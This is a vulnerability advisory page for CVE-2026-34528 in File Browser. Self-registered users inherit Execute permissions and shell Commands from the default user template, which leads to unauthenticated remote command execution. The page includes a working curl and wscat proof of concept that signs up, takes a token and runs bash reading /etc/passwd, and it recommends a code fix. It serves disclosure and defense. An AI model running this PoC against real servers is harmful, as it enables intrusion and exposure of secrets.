Node.js CVE-2026-34528
HIGHSeverity by source
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin (commit a63573b). The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server.
Details
Root Cause
signupHandler at http/auth.go:167-172 applies all default permissions before stripping only Admin:
// http/auth.go
d.settings.Defaults.Apply(user) // copies ALL permissions from defaults
// Only Admin is stripped - Execute, Commands are still inherited
user.Perm.Admin = false
// user.Perm.Execute remains true if set in defaults
// user.Commands remains populated if set in defaultssettings/defaults.go:31-33 confirms Apply copies the full permissions struct including Execute and Commands:
func (d *UserDefaults) Apply(u *users.User) {
u.Perm = d.Perm // includes Execute
u.Commands = d.Commands // includes allowed shell commands
// ...
}The commandsHandler at http/commands.go:63-66 checks both the server-wide EnableExec flag and d.user.Perm.Execute:
if !d.server.EnableExec || !d.user.Perm.Execute {
// writes "Command not allowed." and returns
}The withUser middleware reads d.user from the database at request time (http/auth.go:103), so the persisted Execute=true and Commands values from signup are authoritative. The command allowlist check at commands.go:80 passes because the user's Commands list contains the inherited default commands:
if !slices.Contains(d.user.Commands, name) {
// writes "Command not allowed." and returns
}Execution Flow
- Admin configures:
Signup=true,EnableExec=true,Defaults.Perm.Execute=true,Defaults.Commands=["bash"] - Unauthenticated attacker POSTs to
/api/signup→ new user created withExecute=true,Commands=["bash"] - Attacker logs in → receives JWT with valid user ID
- Attacker opens WebSocket to
/api/command/→withUserfetches user from DB,Execute=truepasses check - Attacker sends
bashover WebSocket →exec.Command("bash")is invoked → arbitrary shell execution
This is a direct consequence of the incomplete fix in commit a63573b (CVE-2026-32760 / GHSA-5gg9-5g7w-hm73), which applied the same rationale ("signup users should not inherit privileged defaults") only to Admin, not to Execute and Commands.
PoC
TARGET="http://localhost:8080"
# Step 1: Self-register (no authentication required)
curl -s -X POST "$TARGET/api/signup" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"AttackerP@ss1!"}'
# Returns: 200 OK
# Step 2: Log in and capture token
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"AttackerP@ss1!"}' | tr -d '"')
# Step 3: Inspect inherited permissions (decode JWT payload)
echo "$TOKEN" | cut -d'.' -f2 | base64 -d 2>/dev/null | python3 -m json.tool
# Expected output (if defaults have Execute=true, Commands=["bash"]):
# {
# "user": {
# "perm": { "execute": true, ... },
# "commands": ["bash"],
# ...
# }
# }
# Step 4: Execute shell command via WebSocket (requires wscat: npm install -g wscat)
echo '{"command":"bash -c \"id && hostname && cat /etc/passwd | head -3\""}' | \
wscat --header "X-Auth: $TOKEN" \
--connect "$TARGET/api/command/" \
--wait 3
# Expected: uid=... hostname output followed by /etc/passwd linesImpact
On any deployment where an administrator has:
- Enabled public self-registration (
signup = true) - Enabled server-side command execution (
enableExec = true) - Set
Execute = truein the default user template - Populated
Commandswith one or more shell commands
An unauthenticated attacker can self-register and immediately gain the ability to run arbitrary shell commands on the server with the privileges of the File Browser process. All files accessible to the process, environment variables (including secrets), and network interfaces are exposed. This is a complete server compromise for processes running as root, and a significant lateral movement vector otherwise.
The original Admin fix (GHSA-5gg9-5g7w-hm73) demonstrates that the project explicitly recognizes that self-registered users should not inherit privileged defaults. The Execute + Commands omission is an incomplete application of that principle.
Recommended Fix
Extend the existing Admin stripping in http/auth.go to also clear Execute and Commands for self-registered users:
// http/auth.go - after d.settings.Defaults.Apply(user)
// Users signed up via the signup handler should never become admins, even
// if that is the default permission.
user.Perm.Admin = false
// Self-registered users should not inherit execution capabilities from
// default settings, regardless of what the administrator has configured
// as the default. Execution rights must be explicitly granted by an admin.
user.Perm.Execute = false
user.Commands = []string{}AnalysisAI
File Browser's self-registration mechanism grants arbitrary shell command execution to unauthenticated attackers when administrators enable signup alongside server-side execution. The signupHandler inherits Execute permissions and Commands lists from default user templates but only strips Admin privileges, allowing newly registered users to immediately execute arbitrary commands via WebSocket with the process's full privileges. Vendor patch available. EPSS data not provided, but the specific configuration requirement (signup + enableExec + Execute in defaults) significantly narrows the attack surface despite the network-accessible, unauthenticated attack vector (CVSS 8.1 High). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis beyond the detailed proof-of-concept in the advisory.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-269 – Improper Privilege Management
View allSame technique Privilege Escalation
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-x8jc-jvqm-pm3f